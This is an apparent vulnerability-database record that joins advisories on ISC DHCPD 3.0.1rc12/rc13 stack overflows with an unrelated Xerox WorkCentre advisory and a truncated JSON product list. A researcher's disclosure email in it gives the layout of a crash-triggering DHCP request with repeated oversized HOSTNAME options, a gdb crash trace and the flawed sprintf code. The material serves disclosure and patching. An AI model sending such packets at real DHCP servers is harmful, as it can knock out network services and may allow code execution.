This definition discards the size argument to the function, potentially allowing any occurrence of vsnprintf() to be exploitable, by overflowing whatever intended buffer is passed to the library call. Other locations in DHCPD utilizing this function may be exploitable. This issue is reported to affect ISC DHCPD versions 3.0.1rc12 and 3.0.1rc13. ISC DHCP calls vsnprintf() to write format log file strings.
Secunia is proud to announce the availability of the Secunia Software Inspector.
The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor.
Try it out online: http://secunia.com/software_inspector/
TITLE: XEROX WorkCentre Products Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA23265
VERIFY ADVISORY: http://secunia.com/advisories/23265/
CRITICAL: Moderately critical
IMPACT: Security Bypass, Manipulation of data, Exposure of system information, Exposure of sensitive information, DoS, System access
WHERE:
From local network
OPERATING SYSTEM: Xerox WorkCentre http://secunia.com/product/4746/ Xerox WorkCentre Pro http://secunia.com/product/4553/
DESCRIPTION: Some vulnerabilities and weaknesses have been reported in various XEROX WorkCentre products, which can be exploited by malicious people to bypass certain security restrictions, expose certain sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system.
1) Input passed to the TCP/IP hostname, the Scan-to-mailbox folder name field, and to the Microsoft Network configuration parameters in the Web User interface is not properly sanitised.
2) Certain browser settings may allow unauthorized access. Additionally, an unspecified vulnerability in the Web User Interface can be exploited to bypass the authentication.
3) The TFTP/BOOTP auto configuration can be exploited to manipulate certain configuration settings.
4) An unspecified error within the handling of email signatures can be exploited to display improper items.
5) Requests to web services can be made through HTTP instead of HTTPS. Other unspecified HTTP security issues and a httpd.conf misconfiguration are also reported.
6) An error within the Scan-to-mailbox feature can be exploited to anonymously download secure files. Additionally, it is possible to anonymously download audit log files.
7) The system fails to keep accurate time resulting in incorrect time stamps in audit logs.
8) The embedded Samba version contains various vulnerabilities. Additionally, the SMB "Homes" share is visible and it's possible to browse the file system via SMB.
9) The SNMP agent does not return errors for non-writable objects. Additionally, authentication failure traps can't be enabled or generated.
10) An error within ops3-dmn can be exploited to crash the service and cause a DoS by attaching a PS script.
11) It is possible to bypass the security restriction and boot Alchemy by e.g. using an USB thumb drive.
12) The "Validate Repository SSL Certificate" scan feature does not verify the FQDN.
13) Certain problems with the Immediate Image Overwrite and On Demand Image Overwrite, a Postgress port block, and a http TRACE XSS attack in the network controller are reported.
14) Two boundary errors within the embedded DHCP implementation can be exploited to cause a buffer overflow, which may allow execution of arbitrary code.
SOLUTION: Apply updated software (see vendor advisories for detailed instructions).
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: Xerox: http://www.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1b.pdf http://www.xerox.com/downloads/usa/en/c/cert_XRX06_004_v11.pdf
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Technical Cyber Security Alert TA04-174A
Multiple Vulnerabilities in ISC DHCP 3
Original release date: June 22, 2004 Last revised: -- Source: US-CERT
Systems Affected
* ISC DHCP versions 3.0.1rc12 and 3.0.1rc13
Overview
Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a denial of the DHCP service on a vulnerable system. It may be possible to exploit these vulnerabilities to execute arbitrary code on the system.
I.
VU#317350 discusses a buffer overflow vulnerability in the temporary storage of log lines. In transactions, ISC DHCPD logs every DHCP packet along with several pieces of descriptive information. The client's DISCOVER and the resulting OFFER, REQUEST, ACK, and NAKs are all logged. In all of these messages, if the client supplied a hostname, then it is also included in the logged line. As part of the DHCP datagram format, a client may specify multiple hostname options, up to 255 bytes per option. These options are concatenated by the server. If the hostname and options contain only ASCII characters, then the string will pass non-ASCII character filters and be temporarily stored in 1024 byte fixed-length buffers on the stack. If a client supplies enough hostname options, it is possible to overflow the fixed-length buffer.
VU#654390 discusses C include files for systems that do not support the bounds checking vsnprintf() function. These files define the bounds checking vsnprintf() to the non-bounds checking vsprintf() function. Since vsprintf() is a function that does not check bounds, the size is discarded, creating the potential for a buffer overflow when client data is supplied. Note that the vsnprintf() statements are defined after the vulnerable code that is discussed in VU#317350. Since the preconditions for this vulnerability are similar to those required to exploit VU#317350, these buffer overflow conditions occur sequentially in the code after the buffer overflow vulnerability discussed in VU#317350, and these issues were discovered and resolved at the same time, there is no known exploit path to exploit these buffer overflow conditions caused by VU#654390. Note that VU#654390 was discovered and exploitable once VU#317350 was resolved.
For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP 3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for all operating systems and configurations. VU#654390 is only defined for the following operating systems:
* AIX
* AlphaOS
* Cygwin32
* HP-UX
* Irix
* Linux
* NextStep
* SCO
* SunOS 4
* SunOS 5.5
* Ultrix
All versions of ISC DCHP 3, including all snapshots, betas, and release candidates, contain the flawed code.
US-CERT is tracking these issues as VU#317350, which has been assigned CVE CAN-2004-0460, and VU#654390, which has been assigned CVE CAN-2004-0461.
II.
III. Solution
Apply patches or upgrade
These issues have been resolved in ISC DHCP 3.0.1rc14. Your vendor may provide specific patches or updates. For vendor-specific information, please see your vendor's site, or look for your vendor infomation in VU#317350 and VU#654390. As vendors report new information to US-CERT, we will update the vulnerability notes.
Appendix B. References
* http://www.isc.org/sw/dhcp/
* http://www.kb.cert.org/vuls/id/317350
* http://www.kb.cert.org/vuls/id/654390
US-CERT thanks Gregory Duchemin and Solar Designer for discovering, reporting, and resolving this vulnerability. Thanks also to David Hankins of ISC for notifying us of this vulnerability and the technical information provided to create this document.
Feedback can be directed to the author: Jason A. Rafail
The latest version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA04-174A.html>
Copyright 2004 Carnegie Mellon University.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
June 22, 2004: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFA2HFSXlvNRxAkFWARArH4AKDtUECQTE5HXmvsDQkwcWn9r7uAowCdGTHq AqWt3CgdEPJcIFDbJlIWQHo= =HSxN -----END PGP SIGNATURE----- . Hi, for those interested to reproduce the recent DOS attacks against ISC DHCPD 3.0.1 rc12 and rc13 as described in: http://www.kb.cert.org/vuls/id/317350 , i'm forwarding the first email i sent to ISC describing several stack based buffer overflows occuring during the creation of log messages and triggered by sending several DHCP HOSTNAME options within a single request. This mail also includes a trace of such DHCP REQUEST.
Other .bss overflows related to vsnprintf and identified later during our investigations as described in: http://www.kb.cert.org/vuls/id/654390 can be triggered the exact same way. Note that the home made tool i am referencing in this email will be made available very soon and already includes ISC, INFOBLOX and DLINK dhcp vulnerabilities I will drop a note here when it is finally released. cheers, Gregory
Special thanks to Solar Designer and David W.Hankins (ISC)
--- Original email ------
Summary:
i have discovered several stack based overflow in your dhcp-3.0.1rc12 and rc13 (may be others, have not checked) these vulnerabilities can be easily triggered by crafting a dhcp discover or request packet which carries several hostname dhcp options that ,once reassembled by the daemon (as explained in rfc 3396), overflow a stack based variable causing the daemon to crash. I believe than one might execute code remotely on the server with the same user account dhcpd is running with, root in most cases. I have been able at some points during the tests, to control eip' 4 bytes (intel 32bits arch), it was during the ddns forward update operation. Note that all tests have been made on a linux 2.4.20-24.9 using a home made tool to generate custom dhcp traffic
Now an example:
see dhcpd.conf in attachment if you need it.
structure of an offending packet (case of a dhcp request based attack)
DHCP request from 0.0.0.0:68 (ff:ff:ff:ff:ff:ff) to 255.255.255.255:67 (ff:ff:ff:ff:ff:ff)
op : BOOT REQUEST (1) htype : Ethernet (10Mb) (1) hlen : 6 hops : 0 xid : 0x00000000 secs : 1 flags : UNICAST (0x0000) ciaddr : 0.0.0.0 yiaddr : 0.0.0.0 siaddr : 255.255.255.255 giaddr : 0.0.0.0 chaddr : ff:ff:ff:ff:ff:ff sname : file : cookie : 0x63825363 (RFC 1497/2132, BOOTP Vendor informations/DHCP options) DHCP option (053 [0x35]) : MESSAGE_TYPE : REQUEST BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA DHCP option (050 [0x32]) : REQUEST_IP : 192.168.0.99
sending this packet to the ptraced daemon (within gdb) gives:
(gdb) run -f -d The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/sbin/dhcpd -f -d Internet Software Consortium DHCP Server V3.0.1rc13 Copyright 1995-2003 Internet Software Consortium. All rights reserved. For info, please visit http://www.isc.org/products/DHCP Wrote 0 deleted host decls to leases file. Wrote 0 new dynamic host decls to leases file. Wrote 0 leases to leases file. Listening on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24 Sending on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24 Sending on Socket/fallback/fallback-net Unable to add forward map from bobAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-1022AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8 860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-284AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1. 92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X 1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.
Program received signal SIGSEGV, Segmentation fault. 0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, name=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at hash.c:363 363 hashno = (*table -> do_hash) (name, len, table -> hash_count); (gdb)
backtracing stack show:
(gdb) bt
0 0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50,
name=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at hash.c:363
1 0x0806fb0a in lease_hash_lookup (ptr=0xbfffde24, table=0x38322d50,
buf=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at mdb.c:2055
2 0x0806eb5b in find_lease_by_hw_addr (lp=0xbfffde24, hwaddr=0x8149dac
"\001\xff\xff\xff\xff\xff\xff", hwlen=7, file=0x80bbe25 "mdb.c", line=1662) at mdb.c:1574
3 0x0806ee5f in hw_hash_add (lease=0x8149d30) at mdb.c:1661
4 0x0806d959 in supersede_lease (comp=0x8149d30, lease=0x811def8,
commit=1, propogate=1, pimmediate=1) at mdb.c:969
5 0x08050cb9 in ack_lease (packet=0x811d6e0, lease=0x8149d30, offer=5,
when=0, msg=0xbfffdfd0 "DHCPREQUEST for 192.168.0.99 from ff:ff:ff:ff:ff:ff via eth0", ms_nulltp=0) at dhcp.c:2227
6 0x0804d041 in dhcprequest (packet=0x811d6e0, ms_nulltp=0,
ip_lease=0x0) at dhcp.c:662
7 0x0804c37d in dhcp (packet=0x811d6e0) at dhcp.c:224
8 0x08088d9a in do_packet (interface=0x811d568, packet=0xbfffe580,
len=1430, from_port=17408, from= {len = 4, iabuf = '\0' }, hfrom=0xbffff5b0) at options.c:2237
9 0x08096718 in got_one (h=0x811d568) at discover.c:785
10 0x080a937e in omapi_one_dispatch (wo=0x0, t=0x0) at dispatch.c:418
11 0x0807cce3 in dispatch () at dispatch.c:103
12 0x0804add1 in main (argc=3, argv=0xbffff904, envp=0xbffff914) at
dhcpd.c:614
13 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6
(gdb)
Note that the daemon may actually crash at a different location depending of the first corrupted structure it meets and therefore, of the size of the malicious option sent, along with the context (type of packet, leases in use etc...)
Problems in the source: I have spent quite some time to find out where the overflow actually takes its roots, here are my findings:
file server/dhcp.c: function dhcprequest :
char msgbuf [1024]; /* XXX */
char *s;
....
if (lease && lease -> client_hostname && db_printable (lease -> client_hostname)) s = lease -> client_hostname; else s = (char *)0;
......
sprintf (msgbuf, "DHCPREQUEST for %s%s from %s %s%s%svia %s", piaddr (cip), smbuf, (packet -> raw -> htype ? print_hw_addr (packet -> raw -> htype, packet -> raw -> hlen, packet -> raw -> chaddr) : (lease ? print_hex_1 (lease -> uid_len, lease -> uid, lease -> uid_len) : "")), s ? "(" : "", s ? s : "", s ? ") " : "", packet -> raw -> giaddr.s_addr ? inet_ntoa (packet -> raw -> giaddr) : packet -> interface -> name);
To summarize, s is referencing the reassembled hostname option passed to the daemon, afterwhat it is used as is in sprintf and stored in msgbuf (fixed size) without any length checking. local msgbuf can obviously be overrun, corrupting various structures in stack and eventually causing the server to crash Note that the call to db_printable( ), filtering hostname, may render the task harder to root a server but likely not impossible. Also being able to corrupt structures like lease or oc may have interesting side effects from an attacker perspective.
void dhcprequest (packet, ms_nulltp, ip_lease) struct packet packet; int ms_nulltp; struct lease ip_lease; { struct lease lease; struct iaddr cip; struct iaddr sip; struct subnet subnet; int ours = 0; struct option_cache oc; struct data_string data; int status; char msgbuf [1024]; / XXX / char s; char smbuf [19];
....
the very same problem is present in dhcpdiscover( ), dhcpdecline( ),
dhcprequest( ) , dhcprelease( ), ...
please look at the diff in unified format, attached to this email, for a
detailed list
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0175",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "fedora",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "infoblox",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandrakesoft",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "suse",
"version": null
},
{
"model": "fedora core",
"scope": "eq",
"trust": 1.6,
"vendor": "redhat",
"version": "core_2.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "8.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "8.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "9.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "7"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.0"
},
{
"model": "linux firewall cd",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "infoblox",
"version": "2.4.0.8"
},
{
"model": "linux connectivity server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.0"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "infoblox",
"version": "2.3.1_r5"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "8.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.1"
},
{
"model": "linux database server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "9.2"
},
{
"model": "dhcpd",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.1"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "infoblox",
"version": "2.4.0.8a"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "9.0"
},
{
"model": "linux admin-cd for firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "email server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "iii"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "8"
},
{
"model": "linux office server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "isc",
"version": null
},
{
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": "3.0.1rc12"
},
{
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": "3.0.1rc13"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "8"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "7"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "8.0"
},
{
"model": "suse email server iii",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "8.2"
},
{
"model": "linux office server",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux firewall on cd",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux database server",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "0"
},
{
"model": "linux connectivity server",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux admin-cd for firewall",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "fedora core2",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "linux mandrake amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.0"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.0"
},
{
"model": "linux mandrake amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.2"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.2"
},
{
"model": "linux mandrake ppc",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.0"
},
{
"model": "dhcpd rc13",
"scope": "eq",
"trust": 0.3,
"vendor": "isc",
"version": "3.0.1"
},
{
"model": "dhcpd rc12",
"scope": "eq",
"trust": 0.3,
"vendor": "isc",
"version": "3.0.1"
},
{
